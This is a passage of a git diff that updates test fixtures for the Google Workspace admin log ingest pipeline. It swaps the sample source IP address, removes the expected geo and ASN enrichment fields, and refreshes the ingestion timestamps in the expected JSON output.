"2021-12-09T13:38:42.564005200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"RELEASE_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "RELEASE_FROM_QUARANTINE", "id": "1", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log index 2c60ded89cc..2df4744cd6e 100644 
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log
@@ -1,14 +1,14 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CREATE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"DELETE_GROUP","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_DESCRIPTION","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_LIST_DOWNLOAD"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"ADD_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"REMOVE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"UPDATE_GROUP_MEMBER_DELIVERY_SETTINGS_CAN_EMAIL_OVERRIDE","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBER_BULK_UPLOAD","parameters":[{"name":"GROUP_MEMBER_BULK_UPLOAD_FAILED_NUMBER","value":"0"},{"name":"GROUP_MEMBER_BULK_UPLOAD_TOTAL_NUMBER","value":"10"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"GROUP_MEMBERS_DOWNLOAD"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_NAME","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"CHANGE_GROUP_SETTING","parameters":[{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"GROUP_SETTINGS","name":"WHITELISTED_GROUPS_UPDATED","parameters":[{"name":"WHITELISTED_GROUPS","value":"a,b,c"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json index 541fe1b6d70..aac7bcf5b20 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-groups.log-expected.json @@ -2,31 +2,13 @@ "expected": [ { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +22,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -64,8 +46,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091057400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717685400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CREATE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CREATE_GROUP", "id": "1", @@ -94,31 +76,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -132,7 +96,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -156,8 +120,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091065900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717691200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"DELETE_GROUP\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "DELETE_GROUP", "id": "1", @@ -186,31 +150,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -224,7 +170,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -248,8 +194,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091068500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717697700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"CHANGE_GROUP_DESCRIPTION\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"}]}}", "provider": "admin", "action": "CHANGE_GROUP_DESCRIPTION", "id": "1", @@ -287,7 +233,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -306,35 +252,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.091070600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", + "ingested": "2021-12-09T13:38:43.717704Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"GROUP_LIST_DOWNLOAD\"}}", "provider": "admin", "action": "GROUP_LIST_DOWNLOAD", "id": "1", 
@@ -357,31 +285,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -395,7 +305,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -419,8 +329,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091072700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717708300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"ADD_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_GROUP_MEMBER", "id": "1", 
@@ -450,31 +360,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -488,7 +380,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -512,8 +404,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091074800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717712700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"REMOVE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REMOVE_GROUP_MEMBER", "id": "1", 
@@ -543,31 +435,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -581,7 +455,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -605,8 +479,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:23.091076700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:43.717717400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"GROUP_SETTINGS\",\"name\":\"UPDATE_GROUP_MEMBER\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "UPDATE_GROUP_MEMBER", "id": "1", @@ -636,31 +510,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" 
